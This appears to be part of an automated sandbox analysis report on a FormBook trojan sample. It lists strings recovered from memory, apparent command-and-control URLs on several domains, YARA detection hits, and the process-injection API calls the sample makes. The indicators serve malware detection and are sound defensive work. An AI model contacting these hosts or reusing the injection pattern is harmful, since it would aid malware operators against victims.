72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000036F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bnbuotqakx.shop
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bnbuotqakx.shop/0hhg/
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
            Source: netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033zg
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netsh.exe, 00000004.00000003.2195098353.000000000806E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: netsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/ssl/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/help/oshibka-404_8500.html
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0042AED3 NtClose,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142B60 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DF0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C70 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011435C0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01144340 NtSetContextThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01144650 NtSuspendThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142B80 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BA0 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BF0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BE0 NtQueryValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AB0 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AD0 NtReadFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AF0 NtWriteFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D10 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D00 NtSetInformationFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D30 NtUnmapViewOfSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DB0 NtEnumerateKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DD0 NtDelayExecution,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C00 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C60 NtCreateKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CA0 NtQueryInformationToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CC0 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CF0 NtOpenProcess,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F30 NtCreateSection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F60 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F90 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FB0 NtResumeThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FA0 NtQuerySection,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FE0 NtCreateFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142E30 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142E80 NtReadVirtualMemory,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142EA0 NtAdjustPrivilegesToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142EE0 NtQueueApcThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143010 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143090 NtSetValueKey,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011439B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143D10 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143D70 NtOpenThread,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B4340 NtSetContextThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B4650 NtSuspendThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2B60 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AF0 NtWriteFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AD0 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F30 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FE0 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FB0 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DD0 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C60 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B35C0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B39B0 NtGetContextThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BF0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BE0 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BA0 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2B80 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AB0 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F60 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FA0 NtQuerySection,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F90 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2E30 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2EA0 NtAdjustPrivilegesToken,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2E80 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D00 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DB0 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C00 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CF0 NtOpenProcess,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CC0 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3010 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3090 NtSetValueKey,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3D70 NtOpenThread,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3D10 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27600 NtCreateFile,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27760 NtReadFile,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C278F0 NtClose,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27850 NtDeleteFile,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 0_2_00CC30D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040F973
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004029D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00401210
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0042D353
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00416313
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00403380
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040FB93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040DC10
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040DC13
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040271D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00402720
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100100
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01198158
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D01AA
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C41A2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C81CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA352
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D03E6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011902C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D0591
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C2446
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BE4F6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01134750
